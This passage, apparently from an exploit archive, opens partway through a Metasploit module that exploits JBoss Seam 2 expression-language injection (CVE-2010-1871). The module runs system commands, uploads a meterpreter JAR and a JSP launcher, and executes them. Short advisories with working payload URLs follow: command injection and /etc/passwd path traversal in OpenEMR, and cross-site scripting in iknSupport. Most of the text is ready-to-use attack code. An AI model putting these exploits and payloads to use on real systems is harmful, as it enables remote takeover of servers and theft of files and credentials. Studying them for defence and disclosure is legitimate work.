JBoss AS 5 and 6, running on Linux with JDKs 6 and 7.
This module provides a more efficient method of exploitation - it
does not loop to find desired Java classes and methods.
NOTE: the check for upload success is not 100% accurate.
NOTE 2: The module uploads the meterpreter JAR and a JSP to launch
it.
},
'Author' => [ 'vulp1n3 <vulp1n3[at]gmail.com>' ],
'References' =>
[
# JBoss EAP 4.3.0 does not properly sanitize JBoss EL inputs
['CVE', '2010-1871'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=615956'],
['URL', 'http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html'],
['URL', 'http://archives.neohapsis.com/archives/bugtraq/2013-05/0117.html']
],
'DisclosureDate' => "Aug 05 2010",
'License' => MSF_LICENSE,
'Platform' => %w{ java },
'Targets' =>
[
[ 'Java Universal',
{
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
]
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8080),
OptString.new('AGENT', [ true, "User-Agent to send with requests", "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"]),
OptString.new('CTYPE', [ true, "Content-Type to send with requests", "application/x-www-form-urlencoded"]),
OptString.new('TARGETURI', [ true, "URI that is built on JBoss Seam 2", "/admin-console/login.seam"]),
OptInt.new('TIMEOUT', [ true, 'Timeout for web requests', 10]),
OptString.new('FNAME', [ false, "Name of file to create - NO EXTENSION! (default: random)", nil]),
OptInt.new('CHUNKSIZE', [ false, 'Size in bytes of chunk per request', 1024]),
], self.class)
end
def check
vprint_status("#{rhost}:#{rport} Checking for vulnerable JBoss Seam 2")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
vprint_debug("Server sent a 302 with location")
if (res.headers['Location'] =~ %r(public\+static\+java\.lang\.Runtime\+java.lang.Runtime.getRuntime\%28\%29))
report_vuln({
:host => rhost,
:port => rport,
:name => "#{self.name} - #{uri}",
:refs => self.references,
:info => "Module #{self.fullname} found vulnerable JBoss Seam 2 resource."
})
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Unknown
end
# If we reach this point, we didn't find the service
return Exploit::CheckCode::Unknown
end
def execute_cmd(cmd)
cmd_to_run = Rex::Text.uri_encode(cmd)
vprint_status("#{rhost}:#{rport} Sending command: #{cmd_to_run}")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(expressions.getClass().forName('java.lang.Runtime')).exec('#{cmd_to_run}')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
if (res.headers['Location'] =~ %r(user=java.lang.UNIXProcess))
vprint_status("#{rhost}:#{rport} Exploit successful")
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
else
vprint_status("#{rhost}:#{rport} Exploit failed.")
end
end
def call_jsp(jspname)
# TODO ugly way to strip off last resource on a path
uri = target_uri.path
*keep,ignore = uri.split(/\//)
keep.push(jspname)
uri = keep.join("/")
uri = "/" + uri if (uri[0] != "/")
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "sessionid=" + Rex::Text.rand_text_alpha(32)
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 200)
vprint_status("Successful request to JSP")
else
vprint_error("Failed to request JSP")
end
end
def upload_jsp(filename,jarname)
jsp_text = <<EOJSP
<%@ page import="java.io.*"
%><%@ page import="java.net.*"
%><%
URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(request.getRealPath("/#{jarname}")).toURI().toURL()});
Class c = cl.loadClass("metasploit.Payload");
c.getMethod("main",Class.forName("[Ljava.lang.String;")).invoke(null,new java.lang.Object[]{new java.lang.String[0]});
%>
EOJSP
vprint_status("Uploading JSP to launch payload")
status = upload_file_chunk(filename,'false',jsp_text)
if status
vprint_status("JSP uploaded to to #{filename}")
else
vprint_error("Failed to upload file.")
end
@pl_sent = true
end
def upload_file_chunk(filename, append='false', chunk)
# create URL-safe Base64-encoded version of chunk
b64 = Rex::Text.encode_base64(chunk)
b64 = b64.gsub("+","%2b")
b64 = b64.gsub("/","%2f")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# TODO Including the conversationId part in this regex might cause
# failure on other Seam applications. Needs more testing
if (res.headers['Location'] =~ %r(user=&conversationId))
#vprint_status("#{rhost}:#{rport} Exploit successful.")
return true
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
else
#vprint_status("#{rhost}:#{rport} Exploit failed.")
return false
end
end
def get_full_path(filename)
#vprint_debug("Trying to find full path for #{filename}")
uri = target_uri.path
res = send_request_cgi(
{
'uri' => normalize_uri(uri),
'method' => 'POST',
'ctype' => datastore['CTYPE'],
'agent' => datastore['AGENT'],
'data' => "actionOutcome=/success.xhtml?user%3d%23{request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/')}"
}, timeout=datastore['TIMEOUT'])
if (res and res.code == 302 and res.headers['Location'])
# the user argument should be set to the result of our call - which
# will be the full path of our file
matches = /.*user=(.+)\&.*/.match(res.headers['Location'])
#vprint_debug("Location is " + res.headers['Location'])
if (matches and matches.captures)
return Rex::Text::uri_decode(matches.captures[0])
else
return nil
end
else
return nil
end
end
def java_stager(fname, chunk_size)
@payload_exe = fname + ".jar"
jsp_name = fname + ".jsp"
#data = payload.encoded_jar.pack
data = payload.encoded_jar.pack
append = 'false'
while (data.length > chunk_size)
status = upload_file_chunk(@payload_exe, append, data[0, chunk_size])
if status
vprint_debug("Uploaded chunk")
else
vprint_error("Failed to upload chunk")
break
end
data = data[chunk_size, data.length - chunk_size]
# first chunk is an overwrite, afterwards, we need to append
append = 'true'
end
status = upload_file_chunk(@payload_exe, 'true', data)
if status
vprint_status("Payload uploaded to " + @payload_exe)
else
vprint_error("Failed to upload file.")
end
# write a JSP that can call the payload in the jar
upload_jsp(jsp_name, @payload_exe)
pe_path = get_full_path(@payload_exe) || @payload_exe
jsp_path = get_full_path(jsp_name) || jsp_name
# try to clean up our stuff;
register_files_for_cleanup(pe_path, jsp_path)
# call the JSP to launch the payload
call_jsp(jsp_name)
end
def exploit
@pl_sent = false
if check == Exploit::CheckCode::Vulnerable
fname = datastore['FNAME'] || Rex::Text.rand_text_alpha(8+rand(8))
vprint_status("#{rhost}:#{rport} Host is vulnerable")
vprint_status("#{rhost}:#{rport} Uploading file...")
# chunking code based on struts_code_exec_exception_delegator
append = 'false'
chunk_size = datastore['CHUNKSIZE']
# sanity check
if (chunk_size <= 0)
vprint_error("Invalid chunk size #{chunk_size}")
return
end
vprint_debug("Sending in chunks of #{chunk_size}")
case target['Platform']
when 'java'
java_stager(fname, chunk_size)
else
fail_with(Failure::NoTarget, 'Unsupported target platform!')
end
handler
end
end
end
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/interface/fax/fax_dispatch.php?file=1%22%20||%20ls%20%3E%20123
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/contrib/acog/print_form.php?formname=../../../etc/passwd%00
source: https://www.securityfocus.com/bid/51788/info
OpenEMR is prone to local file-include and command-injection vulnerabilities because it fails to properly sanitize user-supplied input.
A remote attacker can exploit these issues to execute arbitrary shell commands with the privileges of the user running the application, obtain potentially sensitive information, and execute arbitrary local scripts in the context of the Web server process. This could allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenEMR 4.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/interface/patient_file/encounter/load_form.php?formname=../../../etc/passwd%00
source: https://www.securityfocus.com/bid/51803/info
iknSupport is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/module/kb/search_word/" onmouseover=alert(1) bad=/"/Submit/Search/task/search